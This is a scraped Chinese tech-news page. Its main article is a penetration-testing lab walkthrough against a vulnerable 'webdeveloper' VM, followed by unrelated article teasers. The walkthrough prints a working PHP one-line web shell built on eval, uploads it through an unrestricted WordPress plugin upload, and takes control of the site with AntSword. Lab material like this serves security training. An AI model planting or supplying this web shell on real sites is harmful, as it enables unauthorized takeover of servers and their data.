news 2026/3/3 8:04:03

利用一句话木马夺取目标网站的shell

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
利用一句话木马夺取目标网站的shell

实验准备

目标网站:webdeveloper

工具:一句话木马(shell.php)、蚁剑

实验环境:物理机、虚拟机kali

一、在kali桌面创建一个shell.php文件,写入一句话木马,如图

<?php
@eval($_REQUEST["shell"]);
?>

二、将木马上传webdeveloper网站

利用插件上传不限制文件的漏洞,选择木马文件并上传,显示"not be installed"没关系,打开网页目录:http://192.168.194.134/wp-content/uploads/2025/12/

可以发现shell.php已经下载到网页的uploads目录里:

三、在物理机利用蚁剑连接目标网站

成功连接并控制目标网站,接下来可以随意查看文件,完成目标。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/2/27 8:06:57

基于单片机的停车场栅栏门自动控制设计

基于单片机的停车场栅栏门自动控制设计 第一章 绪论 随着城市机动车保有量的激增&#xff0c;停车场管理效率成为交通流畅性与用户体验的关键环节。传统停车场栅栏门多依赖人工操作或单一刷卡控制&#xff0c;存在响应慢、易拥堵、防砸安全性不足等问题&#xff0c;难以满足现代…

作者头像 李华
网站建设 2026/2/28 2:16:22

深入剖析大规模RAG系统延迟瓶颈与系统级优化策略

大规模RAG系统延迟优化需跳出局部思维&#xff0c;采取系统性工程。文章从检索阶段&#xff08;多级召回、混合检索、智能索引&#xff09;、上下文管理&#xff08;重排序、压缩、Prompt优化&#xff09;、生成阶段&#xff08;高效推理、量化、推测解码&#xff09;到系统级编…

作者头像 李华
网站建设 2026/3/2 9:53:12

GitHub Stars挑战赛:邀请好友助力赢取大奖

LobeChat&#xff1a;开源AI聊天框架的技术演进与落地实践 在大模型技术席卷全球的今天&#xff0c;我们早已不再惊讶于AI能写诗、编程或解答复杂问题。真正决定用户体验的&#xff0c;反而不再是底层模型本身&#xff0c;而是那个每天被点击无数次的——聊天窗口。 当OpenAI用…

作者头像 李华
网站建设 2026/3/2 9:11:16

ALC实验

1、实验拓扑2、实验需求 1、全网互通 2、PC1可以访问Telnet R1&#xff0c;不能ping R13、 PC1不能访问Telnet R2&#xff0c;但可以ping R24、 PC2和PC1相反 3、实验思路 1、配置IP地址 2、配置静态路由&#xff0c;实现全网通 3、配置Telnet&#xff0c;并测试 4、配置ACL&am…

作者头像 李华